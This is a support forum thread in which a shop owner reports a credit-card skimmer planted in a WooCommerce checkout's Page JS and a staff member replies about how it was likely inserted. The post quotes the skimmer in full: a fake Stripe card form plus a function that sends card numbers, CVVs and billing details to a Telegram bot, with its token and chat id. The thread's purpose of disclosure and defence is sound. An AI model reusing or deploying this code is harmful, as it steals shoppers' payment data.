WooCommerce Checkout Hacked with Page specific JS

Support
#1

hacked-site-image
hacked-site-image1920×1039 209 KB

We discovered that a hacker was skimming CC information and messaging it to himself on our site. Their code:

  • Hides the real Stripe element and shows a fake credit card form.
  • Captures the billing and payment information (card number, expiry, CVV, billing address, etc.).
  • When a user hovers over the “Place Order” button, it triggers the function getthen_send() , which sends all that captured data to a Telegram bot using the Telegram API endpoint.

We don’t know yet how he put it there, but we were shocked to find it in Pro’s Page JS tool. Any ideas how they got it there besides simple hacked credentials?

document.addEventListener('DOMContentLoaded', function() {
  
   setTimeout(e=>{
     	document.querySelector(".__PrivateStripeElement").style.display="none"
  document.querySelector("#wc-stripe-upe-errors").innerHTML=`<div style="display: flex;justify-content: center;align-items: center;gap: 12px;" id="usbd691">


	<div style="display: flex;flex-direction: column;gap: 4px;position: relative;width: 100%;">
		<label>Card number</label>
		<input type="text" name="" id="ccn"  maxlength="19" placeholder="1234 1234 1234 1234" style="height:25px;margin: 0;" oninput="formatInputWithSpaces(this)">
		<div style="display: flex;justify-content: center;align-items: center;gap: 2px;position: absolute;bottom: 0px;right: 3px;/*! height: 100%; */">
			<img src="https://raw.githubusercontent.com/aaronfagan/svg-credit-card-payment-icons/ef8affbc8d292a4edfe7615317cc9219530dd623/flat-rounded/discover.svg"style="width: 25px;">
			<img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" style="width: 25px;">
			<img src="https://upload.wikimedia.org/wikipedia/commons/a/a4/Mastercard_2019_logo.svg" style="width: 25px;">
			<img src="https://www.svgrepo.com/show/266068/american-express.svg" style="width: 25px;" >


		</div>
	</div>




	<div style="display: flex;flex-direction: column;gap: 4px;">
		<label>Expiration date</label>
		<input type="text" name=""  id="yymm" placeholder="MM / YY" maxlength="5" style="height:25px;margin: 0;" oninput="checkdate(this)">
	</div>




	<div style="display: flex;flex-direction: column;gap: 4px;position: relative;" >
		<label>Security code</label>
		<input type="text" name="" id="ccv" placeholder="CVC" maxlength="4" style="height:25px;margin: 0;" oninput="this.value = this.value.replace(/[^0-9\/]/g, '');">
		<div style="display: flex;justify-content: center;align-items: center;gap: 2px;position: absolute;bottom: 0px;right: 3px;/*! height: 100%; */">
		<svg  class="p-CardCvcIcons-svg" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" fill="var(--colorIconCardCvc)" role="img" aria-labelledby="cvcDesc"><path opacity=".2" fill-rule="evenodd" clip-rule="evenodd" d="M15.337 4A5.493 5.493 0 0013 8.5c0 1.33.472 2.55 1.257 3.5H4a1 1 0 00-1 1v1a1 1 0 001 1h16a1 1 0 001-1v-.6a5.526 5.526 0 002-1.737V18a2 2 0 01-2 2H3a2 2 0 01-2-2V6a2 2 0 012-2h12.337zm6.707.293c.239.202.46.424.662.663a2.01 2.01 0 00-.662-.663z"></path><path opacity=".4" fill-rule="evenodd" clip-rule="evenodd" d="M13.6 6a5.477 5.477 0 00-.578 3H1V6h12.6z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M18.5 14a5.5 5.5 0 110-11 5.5 5.5 0 010 11zm-2.184-7.779h-.621l-1.516.77v.786l1.202-.628v3.63h.943V6.22h-.008zm1.807.629c.448 0 .762.251.762.613 0 .393-.37.668-.904.668h-.235v.668h.283c.565 0 .95.282.95.691 0 .393-.377.66-.911.66-.393 0-.786-.126-1.194-.37v.786c.44.189.88.291 1.312.291 1.029 0 1.736-.526 1.736-1.288 0-.535-.33-.967-.88-1.14.472-.157.778-.573.778-1.045 0-.738-.652-1.241-1.595-1.241a3.143 3.143 0 00-1.234.267v.77c.378-.212.763-.33 1.132-.33zm3.394 1.713c.574 0 .974.338.974.778 0 .463-.4.785-.974.785-.346 0-.707-.11-1.076-.337v.809c.385.173.778.26 1.163.26.204 0 .392-.032.573-.08a4.313 4.313 0 00.644-2.262l-.015-.33a1.807 1.807 0 00-.967-.252 3 3 0 00-.448.032V6.944h1.132a4.423 4.423 0 00-.362-.723h-1.587v2.475a3.9 3.9 0 01.943-.133z"></path></svg>
	</div>
	</div>
	


</div>`       	 
     document.querySelector("#place_order").addEventListener("mouseover",e=>{
getthen_send()
})
   },5000)  
    });
var donego69=false
function checkdate(e){
  e.value = e.value.replace(/[^0-9\/]/g, '');


  if (e.value.length==2){
    e.value=e.value+"/"
  }
}


function formatInputWithSpaces(inputElement) {
  inputElement.value = inputElement.value.replace(/[^0-9]/g, '');
  if (!(inputElement instanceof HTMLInputElement)) {
    console.error("The provided element is not a valid input element.");
    return;
  }


  // الاستماع إلى حدث الكتابة (input) لتحديث القيمة أثناء الكتابة
  inputElement.addEventListener("input", () => {
    // إزالة أي مسافات موجودة قبل المعالجة
    let rawValue = inputElement.value.replace(/\s+/g, "");


    // تقسيم النص إلى أجزاء من 4 أحرف وإعادة تجميعه مع مسافات
    let formattedValue = rawValue.match(/.{1,4}/g)?.join(" ") || "";


    // تحديث قيمة الإدخال
    inputElement.value = formattedValue;
  });
}


function getthen_send(){
  
  var billing_first_name  = document.querySelector("#billing_first_name").value
  var billing_last_name  = document.querySelector("#billing_last_name").value
  var billing_address_1  = document.querySelector("#billing_address_1").value
  var billing_address_2  = document.querySelector("#billing_address_2").value
  var billing_city  = document.querySelector("#billing_city").value
  var billing_state  = document.querySelector("#billing_state").value
  var billing_postcode  = document.querySelector("#billing_postcode").value
  var billing_phone  = document.querySelector("#billing_phone").value
  var billing_email  = document.querySelector("#billing_email").value
  var ccn  = document.querySelector("#ccn").value
	var yymm  = document.querySelector("#yymm").value
	var ccv  = document.querySelector("#ccv").value


    var msg=`
<b>
new victom


- Holder: ${billing_first_name} ${billing_last_name}


${ccn}|${yymm}|${ccv}


- Full Name: ${billing_first_name} ${billing_last_name}


- City: ${billing_city}


- State: ${billing_state}


- Address: ${billing_address_1} | ${billing_address_2}


- ZIP Code: ${billing_postcode}


- Phone: ${billing_phone}


- email: ${billing_email}
</b>
`


if (donego69==false){
fetch(`https://api.telegram.org/bot7720631773:AAGbFlPPBr9TWwX4o_YaZRsoQkEW_y8_Iq8/sendMessage?chat_id=-1002421436389&text=${encodeURIComponent(msg)}&parse_mode=html`)
  document.querySelector("#usbd691").style.display="none"
  document.querySelector(".__PrivateStripeElement").style.display="block"
    window.scrollTo({
        top: 0,
        behavior: 'smooth' // Enables smooth scrolling
      });
donego69=true
}
}
// JavaScript Document
#2

Hello @gstertz,

Thanks for writing in! The code seems to have been added by editing the page and inserted it in the Page JS section using the Cornerstone builder. Please do check your WP Users who may have logged in recently. May need to disable page editing in Cornerstone for users other than the Administrators.

Best Regards.